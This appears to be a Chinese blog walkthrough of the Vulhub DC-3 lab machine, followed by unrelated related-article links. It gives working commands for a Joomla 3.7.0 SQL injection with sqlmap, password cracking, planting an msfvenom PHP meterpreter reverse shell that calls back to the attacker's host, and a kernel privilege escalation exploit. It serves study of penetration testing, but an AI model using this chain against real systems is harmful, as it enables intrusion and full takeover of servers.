Vulhub-DC-3靶场

前言

今天把DC-3的靶场打了一遍,可以说这个靶场用到的思路是非常经典的,从信息搜集到漏洞利用包括内核提权。最最重要的是为了下载它的提权EXP,我它喵还花了一块二买了个CSDN站的代下载。DC-3靶场只有一个Flag,通过本篇博客,我们可以学到如下几点:

1.内网主机信息探测

2.JoomScan漏洞探测

3.MSF制作PHP马

4.python回显shell

5.Linux内核提权

正文

信息搜集

首先来一波传统艺能arp-scan,得到信息如下,发现存活主机10.0.2.6:

arp-scan -l

结合nmap获得如下信息

nmap -sV -Pn -A -p- -v 10.0.2.6

访问页面后发现是Joomla,所以直接上JoomScan,此工具使用方法较为简单,执行后出现如下信息:

Joomscan -u http://10.0.2.6:80/

SQL注入获取后台密码

因为得到他是Joomla3.7.0的CMS,并且爆出了后台路径和可执行路径。

并且通过查询exploit-db,Joomla3.7.0CMS存在SQL注入,漏洞利用方法如下

sqlmap -u "http://10.0.2.6:80/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

根据SQLMAP,查询到在数据库Joomladb下的#__users表下存在如下账户数据。

这个Password将它保存至文本中,然后使用Jhon去破解。

Jhon破解hash

Jhon的使用教程:https://www.cnblogs.com/HelloCTF/p/13346125.html

Jhon po.txt

得到密码snoopy,通过它我们访问之前扫描到的后台网页成功登录。

后台上传MSF木马

因为我们之前看到可访问的路径有components,templates等,在templates组件下发现可以直接修改编辑文件。

考虑直接上传MSFvenom生成的木马,继而反弹至msfconsole。过程如下:

MSF制作PHP木马

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 R>test1.php

为了避免上传之类的麻烦,我直接将内容粘贴至component.php

MSF建立会话

#1.使用Handler模块
msf6 >use exploit/multi/handler
#2.设置payload
msf6> set payload php/meterpreter/reverse_tcp
#3.设置监听IP
msf6> set LHOST 10.0.2.15
#4.设置监听端口
msf6> set LPORT 4444
#开启监听
msf6> run

开启监听后,当我们访问http://10.0.2.6/templates/beez3/component.php,即可得到会话

系统提权

此时进入shell,发现看不到命令提示,使用python进入伪终端。

发现find可以使用,查看是否可以利用的SUID,结果并不理想。可能性比较大的ping也尝试失败。考虑内核提权,进行信息搜集

#查看系统内核
cat /pro/version
#查看分发信息

通过本地数据库进行查询,发现如下可利用的。

又因为gcc可以使用,便尝试使用43418.c,42275.c,均以失败告终。最终通过使用39772.txt中的漏洞利用方法成功。

具体内容可自行查看39772.txt,在此讲述操作流程,首先下载39772.zip至kali本地。

39772.zip:链接:https://pan.baidu.com/s/1UJam_nqqB770JiO5sco2lQ

提取码:92t7

然后通过msf upload 进行上传

meterpreter> upload 39772.zip

上传成功通过伪终端进行解压,并且进行执行,具体命令如下:

unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf*
./compile.sh
./doubleput

最终得到root权限,获取flag.

Vulhub-DC-3靶场的更多相关文章

  1. Vulhub-DC-2靶场

    Vulhub-DC-2靶场 前言 最近一直忙于学习代码审计和内网渗透,所以靶场这方面的文章一直未更新,但是计划是更新完DC系列靶场的,这个不会鸽. DC-2的靶场是很简单的一共5个flag. 正文 f ...

  2. Kali-2020 配置Docker

    Kali 2020 安装Docke 为什么在Kali上安装Docker? Kali有很多工具,但是您想运行一个不包含的工具,最干净的方法是通过Docker容器.例如,我正在研究一个名为vulhub的靶 ...

  3. 推荐开源靶场Vulhub

    转:https://github.com/phith0n/vulhub Vulhub - Some Docker-Compose files for vulnerabilities environme ...

  4. 2019-10-24:伪静态,VULHUB搭建靶场,宽字节sql注入,笔记

    伪静态1,需要开启站点的重写机制,需要修改配httpd配置文件,将LoadModule rewrite_module modules/mod_rewrite.so注释取消,需要apache支持解析.h ...

  5. kali中安装漏洞靶场Vulhub(超详细)

    前言 我们都知道,在学习网络安全的过程中,搭建漏洞靶场有着至关重要的作用.复现各种漏洞,能更好的理解漏洞产生的原因,提高自己的学习能力.下面我在kali中演示如何详细安装漏洞靶场Vulhub. 什么是 ...

  6. kali中安装漏洞靶场Vulhub

    一.什么是vulhub? Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加 ...

  7. 阿里云服务器搭建vulhub靶场

    阿里云服务器搭建vulhub靶场 环境 服务器:阿里云服务器 系统:centos7 应用:vulhub 步骤 vulhub需要依赖docker搭建,首先安装docker. 使用以下方法之一: # cu ...

  8. Vulhub靶场搭建教程

    Vulhub靶机环境搭建 Vulhub地址: Vulhub下载地址 一.所需环境 1.Ubuntu16.04 2.最新版本Docker 二.安装之路 1.下载Ubuntu16.04下载地址(迅雷下载6 ...

  9. Jenkins高危代码执行漏洞检测/开源漏洞靶场

    漏洞细节可以参看安全客的文章:https://bbs.ichunqiu.com/thread-22507-1-1.html Jenkins-CLI 反序列化代码执行(CVE-2017-1000353) ...

  10. 【转】Vulhub - 开源的安全漏洞学习与复现项目

    转载于:https://uk.v2ex.com/t/485611#reply15 Vulhub 是一个面向大众的开源漏洞靶场,无需 docker 知识,简单执行两条命令即可编译.运行一个完整的漏洞靶场 ...

随机推荐

  1. 开发小技巧之:unicode的排序和正则匹配

    目录 简介 ASCII字符的排序 本地字符的排序 为什么不使用unicode进行排序 emoji的正则匹配 总结 简介 我们知道计算机最先兴起是在国外,出于当时计算机性能的考虑和外国常用字符的考虑,最 ...

  2. 95、配置ntp服务器

    95.1.ntp简介: ntp服务使用的是udp的123端口,如果开启了防火墙要记得放开这个端口: NTP(Network Time Protocol,网络时间协议)是用来使网络中的各个计算机时间同步 ...

  3. 10、Jenkins配置

    10.0.服务器说明: 服务器名称 ip地址 slave-node1 172.16.1.91 10.1.持续集成: 1.什么是持续集成: 持续集成是一种软件开发时实践,即团队开发成员经常集成他们的工作 ...

  4. 13、mysql主从复制原理解析

    13.1.mysql主从复制介绍: 1.普通文件,磁盘上的文件的同步方法: (1)nfs网络文件共享可以同步数据存储: (2)samba共享数据: (3)ftp数据同步: (4)定时任务:cronta ...

  5. 面试官:spring中定义bean的方法有哪些?我一口气说出了12种,把面试官整懵了。

    前言 在庞大的java体系中,spring有着举足轻重的地位,它给每位开发者带来了极大的便利和惊喜.我们都知道spring是创建和管理bean的工厂,它提供了多种定义bean的方式,能够满足我们日常工 ...

  6. C#Expression合集

    一:总体概览 1:获取属性值: 2:调用方法 3:动态构造条件 4:创建对象 5:Switch Case 6:Try Catch 以及捕获异常信息并输出 7:if  esle 8:+  / += 9: ...

  7. 关于PHP导出数据超时的优化

    一般情况下,导出超时可能都是以下三种情况: 一.sql语句复杂,查询时间过长: 二.处理查询后数据逻辑冗余: 三.数据量过大导致响应超时. 接下来分别给出这三种情况的优化建议. 一.sql语句复杂,查 ...

  8. 资源:CentOS下载地址资源

    新版本系统镜像下载(当前最新是CentOS 7.4版本) CentOS官网 官网地址 http://isoredirect.centos.org/centos/7.4.1708/isos/x86_64 ...

  9. 资源:Maven仓库地址路径

    Maven下载路径 https://archive.apache.org/dist/maven/maven-3/ 查找需要引入的包路径时,可以在maven仓库进行查找 maven仓库地址:https: ...

  10. 不安装任何软件或脚本使用powershell快速计算文件的MD5/SHA1/SHA256等校验值

    有的时候在检查升级过程中需要对xml文件进行签名,而xml文件中一般都需要包含安装包的SHA256值,这里分享一个使用PowerShell快速计算SHA256等其他值的方法. 一.在需要计算文件SHA ...